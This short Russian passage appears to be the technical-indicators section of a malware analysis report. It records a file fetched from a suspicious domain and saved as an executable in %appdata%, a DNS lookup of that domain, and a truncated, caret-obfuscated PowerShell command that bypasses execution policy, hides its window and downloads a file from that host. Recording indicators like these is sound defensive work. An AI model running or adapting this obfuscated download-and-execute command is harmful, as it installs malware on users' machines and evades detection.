Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoweRshelL^.E^X^E -^eX^e^c^Uti^o^nPo^Li^c^y BYpASs^ -n^o^P^rOfil^E -^W^In^do^wSt^Y^LE^ ^HIDdEN ^(nEW-^O^b^Je^Ct syst^EM.net.WeBcLIe^N^t)^.D^own^L^OAd^File^('http://hometo...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "PoweRshelL^.E^X^E -^eX^e^c^Uti^o^nPo^Li^c^y BYpASs^ -n^o^P^rOfil^E -^W^In^do^wSt^Y^LE^ ^HIDdEN ^(nEW-^O^b^Je^Ct syst^EM.net.WeBcLIe^N^t)^.D^own^L^OAd^File^('http://hometo...' (со скрытым окном)